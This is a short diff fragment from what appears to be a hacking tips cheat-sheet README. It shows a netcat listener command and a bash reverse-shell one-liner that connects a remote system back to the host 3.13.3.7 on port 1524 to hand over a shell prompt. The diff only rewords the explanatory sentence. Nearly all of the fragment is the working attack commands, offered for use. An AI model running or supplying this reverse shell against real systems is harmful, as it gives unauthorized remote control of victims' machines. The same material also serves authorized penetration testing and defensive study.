hackerschoice/thc-tips-tricks-hacks-cheat-sheet/README.md

 $ nc -nvlp 1524
 ```

-On the remote system.
-This Bash will connect back to your system (IP = 3.13.3.7, Port 1524) and give you a shell prompt:
+On the remote system, this command will connect back to your system (IP = 3.13.3.7, Port 1524) and give you a shell prompt:
 ```
 $ bash -i 2>&1 >&/dev/tcp/3.13.3.7/1524 0>&1
 ```